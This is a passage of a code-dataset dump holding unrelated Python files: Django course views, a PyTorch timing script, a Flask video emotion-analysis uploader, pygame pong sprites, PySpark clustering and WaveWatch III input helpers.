all_course=all_course.order_by(\"-add_time\").all()\r\n\r\n #分页-利用django的pure-pagination\r\n try:\r\n page=request.GET.get(\"page\",1)\r\n except PageNotAnInteger:\r\n page=1\r\n p=Paginator(all_course,12,request=request)#数据集,每页12条数据\r\n courses=p.page(page)#第几页,自动实现跳转第几页\r\n return render(request,\"course-list.html\",locals())\r\n#课程详细信息(访问一次 点击量就+1)\r\nclass CourseDetailView(View):\r\n def get(self,request,course_id=1):\r\n Flag=3\r\n id = request.session.get(\"id\")\r\n if id:\r\n user_obj = UserProfile.objects.filter(id=id).first()\r\n course_obj=Course.objects.filter(id=int(course_id)).first()\r\n #访问量+1\r\n course_obj.click_total+=1\r\n course_obj.save()\r\n #查看机构是否已经收藏\r\n user_fav=UserFavorite.objects.filter(fav_type=2,user_id=id,fav_id=course_obj.courseorg_id).first()\r\n print(user_fav)\r\n #查看课程是否已经收藏\r\n cour_fav=UserFavorite.objects.filter(fav_type=1,user_id=id,fav_id=course_id).first()\r\n #相关课程\r\n if course_obj.tag:\r\n tag_obj=Course.objects.filter(~Q(id=course_id)&Q(tag__icontains=course_obj.tag)).all()[:1]\r\n else:\r\n tag_obj=[]\r\n\r\n return render(request,\"course-detail.html\",locals())\r\n else:\r\n return redirect(\"/login/\")\r\n\r\n#课程的视频信息\r\nclass CoursVideoView(View):\r\n def get(self,request,course_id):\r\n Flag=3\r\n id=request.session.get(\"id\")\r\n user_obj=UserProfile.objects.filter(id=id).first()\r\n if user_obj:\r\n #开始读取页面\r\n course_obj=Course.objects.filter(id=course_id).first()\r\n uc_obj=UserCourse.objects.filter(user_id=id,course_id=course_id).first()\r\n if uc_obj:\r\n pass #已经在学习\r\n else:\r\n u_course=UserCourse()\r\n u_course.user_id=id\r\n u_course.course_id=course_id\r\n u_course.save()\r\n #课程表学习人数加1\r\n course_obj.students+=1\r\n course_obj.save()\r\n #资源下载\r\n all_resource=CourseResource.objects.filter(course_id=course_id).all()\r\n if course_obj:\r\n #存在课程\r\n return render(request,\"course-video.html\",locals())\r\n else:\r\n return redirect(\"/course/list/\",locals())\r\n else:\r\n return redirect(\"/login/\")\r\n#课程的评论信息\r\nclass CoursCommentView(View):\r\n def get(self,request,course_id):\r\n Flag = 3\r\n id = request.session.get(\"id\")\r\n user_obj = UserProfile.objects.filter(id=id).first()\r\n if user_obj:\r\n # 开始读取页面\r\n course_obj = Course.objects.filter(id=course_id).first()\r\n # 资源下载\r\n all_resource = CourseResource.objects.filter(course_id=course_id).all()\r\n if course_obj:\r\n #评论\r\n comments=CourseComments.objects.filter(course_id=course_id).order_by(\"-add_time\").all()\r\n else:\r\n return redirect(\"/course/list/\", locals())\r\n else:\r\n return redirect(\"/login/\")\r\n return render(request,\"course-comment.html\",locals())\r\n\r\n\r\n#发表评论\r\nclass AddCommentView(View):\r\n def post(self,request):\r\n id=request.session.get(\"id\")\r\n course_id=request.POST.get(\"course_id\")\r\n comments=request.POST.get(\"comments\")\r\n if id:\r\n comm=CourseComments()\r\n comm.course_id=course_id\r\n comm.user_id=id\r\n comm.comments=comments\r\n comm.save()\r\n message=\"发表成功\"\r\n return HttpResponse(message)\r\n else:\r\n return redirect(\"/login/\")\r\n\r\nclass VideoPlayView(View):\r\n def get(self,request):\r\n Flag = 3\r\n id = request.session.get(\"id\")\r\n course_id=request.GET.get(\"course_id\")\r\n lesson_id=request.GET.get(\"lesson_id\")\r\n viid=request.GET.get(\"vi_id\")\r\n user_obj = UserProfile.objects.filter(id=id).first()\r\n if user_obj:\r\n # 开始读取页面\r\n course_obj = Course.objects.filter(id=int(course_id)).first()\r\n print(course_obj.id)\r\n #####根据id和课程查询要播放的视频信息第几章的第几个视频\r\n 
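CourseDetailView above bumps click_total with a read-modify-write (`course_obj.click_total += 1` followed by save()), which can drop counts when two requests race. Django's F() expression pushes the increment into a single SQL UPDATE; a sketch against the same Course model:

from django.db.models import F

Course.objects.filter(id=course_id).update(click_total=F('click_total') + 1)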
video_play_obj=Video.objects.filter(id=viid).first()\r\n all_resource = CourseResource.objects.filter(course_id=course_obj.id).all()\r\n if course_obj:\r\n # 存在课程\r\n return render(request, \"course_play.html\", locals())\r\n else:\r\n return redirect(\"/course/list/\", locals())\r\n else:\r\n return redirect(\"/login/\")","sub_path":"OnlineStudy/apps/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"305265143","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 23 17:14:57 2018\n\n@author: Heqi\n\"\"\"\nimport os\n\ndef model(input_dir,r):\n os.system(\"main.py --data_test Demo --scale \"+r +\"--pre_train ../experiment/model/EDSR_baseline_x\"+r+\".pt --test_only --save_results\"+\"--dir_demo\" + input_dir)\n \ninput_dir = \"../cityscape_input\"\nr = 2\nmodel(input_dir,r)","sub_path":"code/mode_run.py","file_name":"mode_run.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"180196699","text":"import datetime\nimport os\nif (os.name == \"nt\"):\n\timport winsound\n\ndef notification():\n if (os.name == \"nt\"):\n \twinsound.Beep(300,500)\n else:\n \tos.system('play --no-show-progress --null --channels 1 synth %s sine %f' % ( 0.5, 300))\n\ndef createLogFile(experimentName):\n\n date = datetime.datetime.now()\n fname = \"log/{}_{}_{}_{}_{}.log\".format(experimentName, date.month, date.day, date.hour, date.minute)\n\n logfile = open(fname, \"w\")\n logfile.write(\"Episode\\tReward\\tStep number\\n\")\n\n return logfile\n","sub_path":"agent/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"569567807","text":"\"\"\"Contains routines for printing protocol messages in JS object format.\n\nNote: This is *not* JSON format, but the format compatible with\nfromObject() toObject() of the JS runtime library.\n\nSee src/google/protobuf/compiler/js/js_generator.cc.\n\nAdapted from json_format.py.\n\nSimple usage example:\n\n # Create a proto object and serialize it to JS object string.\n message = my_proto_pb2.MyMessage(foo='bar')\n js_object_string = js_object_format.MessageToJsObject(message)\n\n # Parse a proto in JS object string format to proto object.\n message = js_object_format.Parse(js_object_string, my_proto_pb2.MyMessage())\n\"\"\"\n\ntry:\n from collections import OrderedDict\nexcept ImportError:\n from ordereddict import OrderedDict #PY26\nimport base64\nimport json\nimport math\nimport re\nimport six\nimport sys\n\nfrom google.protobuf import descriptor\n\n_TIMESTAMPFOMAT = '%Y-%m-%dT%H:%M:%S'\n_INT_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_INT32,\n descriptor.FieldDescriptor.CPPTYPE_UINT32,\n descriptor.FieldDescriptor.CPPTYPE_INT64,\n descriptor.FieldDescriptor.CPPTYPE_UINT64])\n_INT64_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_INT64,\n descriptor.FieldDescriptor.CPPTYPE_UINT64])\n_FLOAT_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_FLOAT,\n descriptor.FieldDescriptor.CPPTYPE_DOUBLE])\n_INFINITY = 'Infinity'\n_NEG_INFINITY = '-Infinity'\n_NAN = 'NaN'\n\n_UNPAIRED_SURROGATE_PATTERN = re.compile(six.u(\n r'[\\ud800-\\udbff](?![\\udc00-\\udfff])|(? 
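createLogFile() in utils.py above names logs month_day_hour_minute with no zero padding and no year, so the filenames do not sort chronologically. strftime gives a sortable stamp (a sketch, same log/ layout assumed):

import datetime

def log_name(experiment_name):
    stamp = datetime.datetime.now().strftime('%Y%m%d_%H%M')
    return 'log/{}_{}.log'.format(experiment_name, stamp)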
int:\n x = 0\n y = 0\n direction = (0, 1)\n\n lines = s.splitlines()\n for line in lines:\n d = line[0]\n n = int(line[1:])\n\n if d == 'N':\n y -= n\n elif d == 'S':\n y += n\n elif d == 'E':\n x += n\n elif d == 'W':\n x -= n\n elif d == 'L':\n rotations = n // 90\n ind = DIRECTIONS.index(direction)\n direction = DIRECTIONS[(ind - rotations) % 4]\n elif d == 'R':\n rotations = n // 90\n ind = DIRECTIONS.index(direction)\n direction = DIRECTIONS[(ind + rotations) % 4]\n elif d == 'F':\n y += n * direction[0]\n x += n * direction[1]\n else:\n raise NotImplementedError\n\n return abs(x) + abs(y)\n\n\nSAMPLE = '''\\\nF10\nN3\nF7\nR90\nF11\n'''\n\n\n@pytest.mark.parametrize(\n ('input_s', 'expected'),\n (\n (SAMPLE, 25),\n ),\n)\ndef test(input_s: str, expected: int) -> None:\n assert compute(input_s) == expected\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument('data_file', nargs='?', default=INPUT_TXT)\n args = parser.parse_args()\n\n with open(args.data_file) as f, timing():\n print(compute(f.read()))\n\n return 0\n\n\nif __name__ == '__main__':\n exit(main())\n","sub_path":"day12/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"490228541","text":"import pygame\nimport random\nfrom pingpong.settings import SCREEN_WIDTH, SCREEN_HEIGHT, BALL_YSPEED_INCREASE, BALL_YSPEED_MAX, BALL_YSPEED_START, RACKET_SPEED, RACKET_WIDTH_START, RACKET_WIDTH_MIN, RACKET_WIDTH_DECREASE\nfrom pygame.locals import (\n RLEACCEL,\n K_LEFT,\n K_RIGHT,\n) \n\nFIGPATH = \"pingpong/figs/\"\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n super(Player, self).__init__()\n self.racket_width = RACKET_WIDTH_START\n self.surf = pygame.Surface((self.racket_width, 20))\n self.surf.fill((255, 255, 255))\n self.rect = self.surf.get_rect(\n center=(\n SCREEN_WIDTH/2,\n SCREEN_HEIGHT,\n )\n )\n self.speed = RACKET_SPEED\n\n # Move the sprite based on user keypresses\n def update(self, pressed_keys):\n if pressed_keys[K_LEFT]:\n self.rect.move_ip(-self.speed, 0)\n if pressed_keys[K_RIGHT]:\n self.rect.move_ip(self.speed, 0)\n\n # Keep player on the screen\n # if self.rect.left < 0:\n # self.rect.left = 0\n # if self.rect.right > SCREEN_WIDTH:\n # self.rect.right = SCREEN_WIDTH\n \n \n def updateRL(self, action):\n if action == 0: #left\n self.rect.move_ip(-self.speed, 0)\n elif action == 1: #right\n self.rect.move_ip(self.speed, 0)\n #else:\n\n\n # Keep player on the screen\n if self.rect.left < 0:\n self.rect.left = 0\n if self.rect.right > SCREEN_WIDTH:\n self.rect.right = SCREEN_WIDTH\n\n def update_racket(self):\n x_pos = self.rect.centerx\n self.racket_width = self.racket_width*RACKET_WIDTH_DECREASE if self.racket_width > RACKET_WIDTH_MIN else RACKET_WIDTH_MIN\n self.surf = pygame.Surface((self.racket_width, 20))\n self.surf.fill((255, 255, 255))\n self.rect = self.surf.get_rect(\n center=(\n x_pos,\n SCREEN_HEIGHT,\n )\n )\n\n \n\nclass Ball(pygame.sprite.Sprite):\n def __init__(self):\n super(Ball, self).__init__()\n self.surf = pygame.Surface((20, 20))\n self.surf.fill((255, 255, 255))\n self.rect = self.surf.get_rect(\n center=(\n SCREEN_WIDTH/2,\n 10,\n )\n )\n self.xspeed = random.randint(3,10)\n self.yspeed = BALL_YSPEED_START\n\n # Move the sprite based on speed\n # Remove the sprite when it passes the left edge of the screen\n def update(self):\n if self.rect.left < 0:\n self.xspeed *= -1\n if self.rect.right > SCREEN_WIDTH:\n self.xspeed *= 
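compute() above rotates by indexing into the DIRECTIONS table; a common alternative keeps the heading as a complex number, where every 90-degree turn is a multiplication by 1j or -1j. A sketch with hypothetical names, using math-style axes (y grows north), unlike the grid convention above:

heading = 1 + 0j  # unit vector, facing east

def turn(heading, letter, degrees):
    q = degrees // 90
    return heading * ((1j if letter == 'L' else -1j) ** q)

def forward(pos, heading, n):
    return pos + heading * n  # pos is also a complex number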
-1\n if self.rect.top < 0:\n self.yspeed *= -1\n if self.rect.bottom > SCREEN_HEIGHT:\n return True\n\n self.rect.move_ip(self.xspeed, self.yspeed)\n return False\n\n def pong(self):\n self.yspeed *= -BALL_YSPEED_INCREASE\n if self.yspeed > BALL_YSPEED_MAX:\n self.yspeed = BALL_YSPEED_MAX\n\n # if random.randint(0,1) == 0:\n # self.xspeed += -1\n # else:\n # self.xspeed += 1\n\n # if self.xspeed > 20:\n # self.xspeed = 20\n # elif self.xspeed < -20:\n # self.xspeed = -20\n\n\nclass Score(pygame.sprite.Sprite):\n def __init__(self):\n super(Score, self).__init__()\n self.myFont = pygame.font.Font(f\"{FIGPATH}AtariClassic.ttf\", 30)\n self.white = (255,255,255)\n self.score = 0\n ### pass a string to myFont.render\n self.surf = self.myFont.render(f\"score: {self.score}\", 1, self.white)\n self.rect = self.surf.get_rect(left=10, top=10)\n \n\n def update(self):\n self.score += 1\n self.surf = self.myFont.render(f\"score: {self.score}\", 1, self.white)\n self.rect = self.surf.get_rect(left=10, top=10)\n","sub_path":"pingpong/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"510579937","text":"import BinModel\nimport NormBinModel\nimport NonBinModel\nfrom torch.autograd import Variable\nimport torch\nimport time\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn as nn\n\nbatches = 128\niter = 390\ntotal_time = 0\ntimes = 100\n\ndevice = torch.device('cuda:0')\n\ntransform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n])\nprint('==> Preparing data..')\ntestset = torchvision.datasets.CIFAR10(root='/export/livia/data/xxu/CIFAR10', train=False, download=False, transform=transform_test)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=0)\n\n\nprint('==> Building model..')\nnonBinModel = NonBinModel.NonBinModel()\nnonBinModel = nn.DataParallel(nonBinModel)\nnonBinModel.to(device)\nnonBinModel.eval()\nprint('==> Evaluating..')\nstart1 = time.time()\nfor epoch in range(times):\n with torch.no_grad():\n start = time.time()\n for batch_index, (inputs, targets) in enumerate(testloader):\n inputs = inputs.to(device)\n inputs = Variable(inputs)\n outputs = nonBinModel(inputs)\n end = time.time() - start\n print('Epoch: %d || Time: %f' % (epoch, end))\n total_time += end\ntorch.cuda.synchronize()\nprint('None Binarized Model Time: %f' % (total_time / 100))\n\nprint('==> Building model..')\nnormBinModel = NormBinModel.NormBinModel()\nnormBinModel = nn.DataParallel(normBinModel)\nnormBinModel.to(device)\nnormBinModel.eval()\nprint('==> Evaluating..')\nstart2 = time.time()\nfor epoch in range(times):\n start = time.time()\n with torch.no_grad():\n for batch_index, (inputs, targets) in enumerate(testloader):\n inputs = inputs.to(device)\n inputs = Variable(inputs)\n outputs = normBinModel(inputs)\n end = time.time() - start\n print('Epoch: %d || Time: %f' % (epoch, end))\n total_time += end\ntorch.cuda.synchronize()\nprint('Normal Binarized Model Time: %f' % (total_time / 100))\n\nprint('==> Building model..')\nbinModel = BinModel.BinModel()\nbinModel = nn.DataParallel(binModel)\nbinModel.to(device)\nbinModel.eval()\nprint('==> Evaluating..')\nfor epoch in range(times):\n start = time.time()\n with torch.no_grad():\n for batch_index, (inputs, targets) in enumerate(testloader):\n inputs= inputs.to(device)\n inputs = 
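In TimeTest.py above, time.time() is read right after each batch loop while torch.cuda.synchronize() only runs after all epochs, so the printed per-epoch times can measure kernel launches rather than completed GPU work. The usual pattern brackets the timed region with synchronize(); `model` here stands in for any of the three networks above:

import time
import torch

torch.cuda.synchronize()
start = time.time()
with torch.no_grad():
    for inputs, _ in testloader:
        outputs = model(inputs.to(device))
torch.cuda.synchronize()  # wait for queued kernels before stopping the clock
elapsed = time.time() - start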
Variable(inputs)\n outputs = binModel(inputs)\n end = time.time() - start\n print('Epoch: %d || Time: %f' % (epoch, end))\n total_time += end\ntorch.cuda.synchronize()\nprint('Adapted Binarized Model Time: %f' % (total_time / 100))\n\n","sub_path":"GPU/TimeTest.py","file_name":"TimeTest.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"196935039","text":"\"\"\"\r\n841 Keys and Rooms\r\n\r\nThere are N rooms and you start in room 0. Each room has a distinct number in 0, 1, 2, ..., N-1, and each room may have some keys to access the next room. \r\n\r\nFormally, each room i has a list of keys rooms[i], and each key rooms[i][j] is an integer in [0, 1, ..., N-1] where N = rooms.length. A key rooms[i][j] = v opens the room with number v.\r\n\r\nInitially, all the rooms start locked (except for room 0). \r\n\r\nYou can walk back and forth between rooms freely.\r\n\r\nReturn true if and only if you can enter every room.\r\n\r\nExample 1:\r\n\r\nInput: [[1],[2],[3],[]]\r\nOutput: true\r\nExplanation: \r\nWe start in room 0, and pick up key 1.\r\nWe then go to room 1, and pick up key 2.\r\nWe then go to room 2, and pick up key 3.\r\nWe then go to room 3. Since we were able to go to every room, we return true.\r\nExample 2:\r\n\r\nInput: [[1,3],[3,0,1],[2],[0]]\r\nOutput: false\r\nExplanation: We can't enter the room with number 2.\r\nNote:\r\n\r\n1 <= rooms.length <= 1000\r\n0 <= rooms[i].length <= 1000\r\nThe number of keys in all rooms combined is at most 3000.\r\n\"\"\"\r\nfrom collections import deque\r\nclass Solution:\r\n # my own BFS solution\r\n def canVisitAllRooms(self, rooms):\r\n \"\"\"\r\n :type rooms: List[List[int]]\r\n :rtype: bool\r\n \"\"\"\r\n N = len(rooms)\r\n color = [0]*N # 0: white, 1: gray, 2: black\r\n color[0] = 1\r\n\r\n q = deque([0])\r\n while q:\r\n u = q.popleft()\r\n for v in rooms[u]:\r\n if color[v] == 0:\r\n color[v] = 1\r\n q.append(v)\r\n \r\n color[u] = 2\r\n \r\n return all(value == 2 for value in color)\r\n\r\n#rooms = [[1],[2],[3],[]]\r\nrooms = [[1,3],[3,0,1],[2],[0]]\r\nprint(Solution().canVisitAllRooms(rooms))","sub_path":"code841KeysAndRooms.py","file_name":"code841KeysAndRooms.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"539014505","text":"#!/usr/bin/env python\n# coding: utf-8\n# author: map Karthik\n\n\n\nimport sys\nfrom pyspark import SparkConf, SparkContext, SQLContext\nfrom pyspark.mllib.clustering import PowerIterationClustering, PowerIterationClusteringModel\nimport os\nimport traceback\n\n# initializing spark\nconf = SparkConf()\nsc = SparkContext.getOrCreate(conf=conf)\nsqlCon = SQLContext(sc)\n#directory settings\nbase_folder = os.path.abspath(\"..\")\nraw_folder = os.path.join(base_folder,\"data/\")\ndat_folder = os.path.join(base_folder,\"src/\")\npreprocessed_folder = os.path.join(base_folder,\"preprocessed/\")\nresults_folder = os.path.join(base_folder,\"results/\")\n\nprint(\"Starting to read the file...\")\n# reading from the graph_sims file\ndata = sc.textFile(preprocessed_folder+'adjacency_graph_final_data.csv')\nheader = data.first()\n\nprint(\"File Read...\\n\")\n#mapper to convert data into required form RDD(long,long,double)\ndef initialProcess(lines):\n x= lines.split(',')\n x = (int(x[0]),int(x[1]),float(x[2]))\n return x\n\n#filtering out the header\nsims=data.filter(lambda x: 
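canVisitAllRooms() above carries the full white/gray/black coloring of textbook BFS; for plain reachability a visited set is enough (sketch):

def can_visit_all_rooms(rooms):
    seen = {0}
    stack = [0]
    while stack:
        for key in rooms[stack.pop()]:
            if key not in seen:
                seen.add(key)
                stack.append(key)
    return len(seen) == len(rooms)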
x!=header).map(initialProcess)\n\nsims.cache()\n\nprint(\"simRDD cached...\\n\")\nnum_iterations = [35,50,60]\n\nfor num in num_iterations:\n \n try:\n \n # PIC(RDD,num_clusters,num_iterations) defaults: num_iterations=100\n\t# train(rdd,k,maxiterations)\n model = PowerIterationClustering.train(sims,100,num)\n\n print(\"model trained\\t num_iterations:\"+str(num)+\"\\n\")\n #Saving Clusters\n clusters = model.assignments()\n clustRDD = clusters.map(lambda x: (x.id,x.cluster))\n clust_df = clustRDD.toDF()\n\n clust_df.write.csv(results_folder + 'clusters_'+str(num),header = 'true')\n print(\"csv for {} iterations written\".format(num))\n except Exception:\n log = open(\"exception.log\",\"w+\")\n traceback.print_exc(file=log)\n\nprint(\"**************Complete****************\")\n#clust_df = clust_df.rename(columns={'_1':'NodeID','_2':'Cluster'})\n#clust_df.to_csv('clusters.csv',index=False)\n\n\n\n\n\n\n","sub_path":"src/pic_clustering.py","file_name":"pic_clustering.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"508387506","text":"import asyncio\n\nfrom ._parse import parse\nfrom .client import Client\nfrom .cluster import Cluster\nfrom .errors import BalancerManagerError\nfrom .helpers import find_object\n\n\nclass BalancerManager(object):\n def __init__(self, client):\n if isinstance(client, Client):\n self.client = client\n elif isinstance(client, dict):\n self.client = Client(**client)\n else:\n raise TypeError('client arg must be either py_balancer_manager.Client object or dict')\n\n self.httpd_version = None\n self.httpd_compile_date = None\n self.openssl_version = None\n self.clusters = list()\n self.date = None\n\n def __repr__(self):\n return f''\n\n @property\n def holistic_error_status(self):\n for cluster in self.clusters:\n # if self.holistic_error_status is True:\n # return False\n for route in cluster.routes:\n if route._status.error.value is True:\n return True\n return False\n\n def new_cluster(self, name):\n cluster = Cluster(self, name)\n self.clusters.append(cluster)\n return cluster\n\n def cluster(self, name):\n try:\n return find_object(self.clusters, 'name', name)\n except ValueError:\n raise BalancerManagerError(f'could not locate cluster name in list of clusters: {name}')\n\n async def update(self, response_payload=None):\n loop = asyncio.get_running_loop()\n if response_payload is None:\n async with self.client:\n response_payload = await self.client.get()\n await loop.run_in_executor(None, parse, response_payload, self)\n return self\n","sub_path":"py_balancer_manager/balancer_manager.py","file_name":"balancer_manager.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"330013544","text":"import sys\nimport math\nimport string\nfrom decimal import *\nimport operator\n\n#容忍 用来限制迭代次数\nrongren = 4E-20\n\n#accu 确定精确度\n\n#统计每个数字出现的次数\ndef fun1(x):\n num = []\n dic = {}\n for i in x:\n if i in dic:\n continue\n else:\n dic[i] = x.count(i)\n #对key的值排序,得到list,list转dict\n sorted_key_list=sorted(dic.items(),key=operator.itemgetter(0))\n\n sort_dic = dict(sorted_key_list)\n\n #打印排序之后的字典\n for key,value in sort_dic.items():\n print('{key}:{value}'.format(key = key ,value = value))\n\n #批量注释 ctrl+/\n # print('0:',dic['0'])\n # print('1:', dic['1'])\n # print('2:', dic['2'])\n # print('3:', dic['3'])\n # print('4:', dic['4'])\n # print('5:', dic['5'])\n # print('6:', dic['6'])\n # 
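fun1() above counts each digit with x.count() inside a loop (quadratic in the input length) and then sorts the dict by key; collections.Counter does the counting in a single pass:

from collections import Counter

def fun1(x):
    for key, value in sorted(Counter(x).items()):
        print('{key}:{value}'.format(key=key, value=value))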
print('7:', dic['7'])\n # print('8:', dic['8'])\n # print('9:', dic['9'])\n\n\n#n为数列的某一项\ndef bbp(n):\n\n pi = Decimal(0)\n k = 0\n while k')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\n\n@app.route('/upload', methods=['GET', 'POST'])\ndef upload():\n global current_df, current_video, graph\n app.logger.info(\"/upload accessed\")\n if request.method == 'POST':\n preview = False\n # check if the post request has the file part\n file = request.files.get('files[]')\n app.logger.info(\"{} - File received\".format(file.filename))\n if not file:\n # flash('No file part', category=\"Error\")\n app.logger.error('No file part')\n return redirect(request.url)\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n # flash('No selected file', category=\"Error\")\n return redirect(request.url)\n elif file and not allowed_file(file.filename):\n flash('Filename {} not allowed. Try with mp4 files'.format(\n file.filename))\n elif file and allowed_file(file.filename):\n session.clear()\n filename = secure_filename(file.filename)\n session['complete_video'] = request.files.get(\n 'completeVideo', False)\n mp4path = to_uploads(filename)\n file.save(mp4path)\n app.logger.info(\"Saved to {}\".format(mp4path))\n current_video = load_video(mp4path)\n screenshot = get_frame(current_video, encoding='opencv')\n cv2.imwrite(to_uploads('screenshot.png'), screenshot)\n session['screenshot'] = 'screenshot.png'\n session['filename'] = filename\n session['loaded'] = True\n results = analyze()\n return results\n # response = None\n # if analyze_response.status == 200:\n # # return redirect('/')\n # response = app.response_class(\n # response=json.dumps(session),\n # status=200,\n # mimetype='application/json'\n # )\n # app.logger.info(\"prepared response\")\n # else:\n # app.logger.error(analyze_response)\n # return response\n app.logger.error(\"Error with analysis\")\n return False\n # return redirect(url_for('analyze'))\n\n\ndef remove_frames(folder):\n files = glob.glob(os.path.join(folder, 'frame*.jpg'))\n for file in files:\n os.remove(file)\n\n\n@app.route('/analyze', methods=['GET'])\ndef analyze():\n \"\"\"Process analyze request.\"\"\"\n global current_df, current_video, graph\n results = []\n output = {}\n # Remove previous frames\n remove_frames(app.config['UPLOAD_FOLDER'])\n\n # Analyze video and save every nth frame\n try:\n assert current_video.cap.get(\n cv2.CAP_PROP_FRAME_HEIGHT) > 0, 'Video not loaded correctly'\n frequency = 1 if session['complete_video'] else 20\n app.logger.info(\"Analyzing every {} frame\".format(frequency))\n df = current_video.analyze(\n detector, display=False, frequency=frequency, output='pandas')\n if df.dropna().empty:\n # flash('No faces detected in sampled frames of {}'.format(current_video.filename()),'error')\n app.logger.error(\n 'No faces detected in sampled frames of {}'.format(\n current_video.filename()))\n return Response('Upload failed', status=300)\n elif len(df.dropna()) == 1:\n # flash('Only one of sample frames found with face - try another video.','error')\n app.logger.error(\n \"Only one sample frame found with face - try another video\")\n except AttributeError:\n app.logger.error('current_video is NoneType')\n return Response('Upload failed', status=500)\n root, ext = os.path.splitext(session.get('filename'))\n video_outfile = root + '_output' + ext\n\n if not os.path.isfile(to_uploads(video_outfile)):\n # flash('Video output.mp4 not found on 
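remove_frames() in the Flask app above globs frame*.jpg and unlinks each match; pathlib states the same intent without the os.path.join/glob pairing (sketch):

from pathlib import Path

def remove_frames(folder):
    for frame in Path(folder).glob('frame*.jpg'):
        frame.unlink()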
server','error')\n app.logger.error(\"Video {} not found on server\".format(\n to_uploads(video_outfile)))\n session['video_filename'] = video_outfile\n current_df = current_video.get_first_face(df).dropna()\n csvpath = ''.join(session['filename'].split('.')[:-1]) + '.csv'\n csvpath = to_uploads(csvpath)\n current_df.to_csv(csvpath)\n session['csv_filename'] = os.path.split(csvpath)[1]\n session['dataframe'] = current_df.head(5).to_html(\n float_format=lambda x: '%.2f' % x, classes='mystyle')\n\n # session['dataframe'] = current_df.head(10).style.format('%.2f').render()\n session['output_images'] = get_output_images(current_video.outdir)\n emotions = current_video.get_emotions(current_df)\n try:\n emotions.plot()\n except TypeError:\n # flash('Empty DataFrame', 'error')\n app.logger.error(\"Empty dataframe\")\n return False\n emotions_chart = to_uploads('emotions_chart.png')\n plt.savefig(emotions_chart)\n session['emotions_chart'] = 'emotions_chart.png'\n session['explore'] = True\n result = jsonify({\n 'files': [{\n 'url': (f'uploads/{video_outfile}'),\n 'name': session['filename'],\n 'screenshots': session.get('output_images'),\n 'plot_url': 'uploads/' + session.get('emotions_chart'),\n 'dataframe': session.get('dataframe')\n }]\n })\n return result\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n global current_df, current_video, graph\n return render_template('index.html', **session)\n\n\n@app.after_request\ndef add_header(response):\n \"\"\"\n Add headers to both force latest IE rendering engine or Chrome Frame,\n and also to cache the rendered page for 10 minutes.\n \"\"\"\n response.headers['X-UA-Compatible'] = 'IE=Edge,chrome=1'\n response.headers['Cache-Control'] = 'public, max-age=0'\n return response\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\nelse:\n gunicorn_logger = logging.getLogger('gunicorn.error')\n app.logger.handlers = gunicorn_logger.handlers\n app.logger.setLevel(gunicorn_logger.level)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"521729881","text":"import subprocess\nimport os\nimport glob\nimport yaml\nimport pprint\nimport ww3_log\nimport datetime\n\npwd = os.getcwd()\n\n# Output type options\nout_types = {'wave':{'type':'2','prefix':'ww3.','subtype':'2'}, # mean wave parameters \n 'met': {'type':'2','prefix':'cfsr.','subtype':'1'}, # depth, current, wind\n 'spec':{'type':'1','prefix':'spec.','subtype':'3'}} \n###################################################################################################\n###################################################################################################\n\ndef replace_ww3_ounp_inp_line(comment,opt1,opt2=None,opt3=None,opt4=None):\n\n # Find the requested line (nline) in the ww3_ounp input file\n founp = open(pwd+'/ww3_ounp.inp','r')\n lines = founp.read().splitlines()\n for n,line in enumerate(lines):\n if line.find(comment) > 0:\n break\n n = n+1\n \n # Replace the line with the new information (opt1 and opt2) \n line_info = lines[n].split()\n line_info[0] = opt1\n if opt2:\n line_info[1] = opt2\n if opt3:\n line_info[2] = opt3\n if opt4:\n line_info[3] = opt4\n lines[n] = ' '+' '.join(line_info)\n founp.close()\n \n # Re-write the ww3_ounp input file\n founp = open(pwd+'/ww3_ounp.inp','w')\n founp.write('\\n'.join(lines))\n 
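replace_ww3_ounp_inp_line() above scans for the comment with line.find(comment) > 0, which also misses a match at column 0, and then runs n = n + 1 unconditionally, so a missing comment silently edits (or overruns) the last line. A sketch of the same scan with an explicit failure:

def find_line_after(lines, comment):
    for n, line in enumerate(lines):
        if comment in line:  # `in` also matches at column 0
            return n + 1
    raise ValueError('comment {!r} not found in ww3_ounp.inp'.format(comment))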
